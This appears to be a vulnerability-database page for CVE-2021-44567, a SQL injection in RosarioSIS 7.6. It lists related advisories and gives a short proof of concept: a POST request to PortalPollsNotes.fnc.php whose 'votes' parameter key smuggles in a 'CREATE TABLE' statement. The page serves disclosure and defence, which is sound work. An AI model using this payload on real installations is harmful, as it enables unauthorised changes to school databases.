| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2021-44567 | 24 Feb 202218:21 | – | circl | |
| RosarioSis SQL注入漏洞 | 24 Feb 202200:00 | – | cnnvd | |
| CVE-2021-44567 | 22 Feb 202220:16 | – | cve | |
| CVE-2021-44567 | 22 Feb 202220:16 | – | cvelist | |
| EUVD-2022-0900 | 3 Oct 202520:07 | – | euvd | |
| SQL injection in francoisjacquet/rosariosis | 25 Feb 202200:01 | – | github | |
| CVE-2021-44567 | 24 Feb 202215:15 | – | nvd | |
| GHSA-82RR-MQ4R-P4R3 SQL injection in francoisjacquet/rosariosis | 25 Feb 202200:01 | – | osv | |
| 📄 RosarioSIS SQL Injection | 11 Apr 202500:00 | – | packetstorm | |
| Sql injection | 24 Feb 202215:15 | – | prion |
# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567
PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest
constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array )
votes['; CREATE TABLE aaa(t text) --]=1Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation